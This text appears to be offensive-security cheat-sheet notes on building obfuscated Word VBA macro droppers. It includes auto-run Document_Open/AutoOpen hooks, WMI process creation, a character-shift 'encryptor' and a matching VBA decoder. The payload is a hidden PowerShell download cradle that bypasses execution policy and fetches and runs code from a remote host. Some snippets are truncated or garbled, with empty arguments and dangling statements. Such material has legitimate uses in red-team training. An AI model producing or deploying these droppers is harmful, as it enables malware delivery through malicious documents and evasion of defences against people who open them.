Powershell Inside VBA
Obfuscated (without shell & powershell call)
Obfuscated and execute with Windows Management Instrumentation (WMI) process creation
Function bears(cows)
bears = StrReverse(cows)
End Function
Sub Mymacro()
Dim strArg As String
strArg = bears()
.Create strArg, Null, Null, pid
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
Mymacro
End SubCustom encryptor
$payload = "powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/'))"
[string]$output = ""
$payload.ToCharArray() | %{
[string]$thischar = [byte][char]$_ + 17
if($thischar.Length -eq 1)
{
$thischar = [string]"00" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 2)
{
$thischar = [string]"0" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 3)
{
$output += $thischar
}
}
$output | clipFunction Pears(Beets)
Pears = Chr(Beets - 17)
End Function
Function Strawberries(Grapes)
Strawberries = Left(Grapes, 3)
End Function
Function Almonds(Jelly)
Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
Function Nuts(Milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(Milk))
Milk = Almonds(Milk)
Loop While Len(Milk) > 0
Nuts = Oatmilk
End Function
Function MyMacro()
("") Then
Exit Function
End If
Dim Apples As String
Dim Water As String
Apples =
Water = Nuts(Apples)
(Nuts("")).Get(Nuts("")).Create Water, Tea, Coffee, Napkin
End FunctionLast updated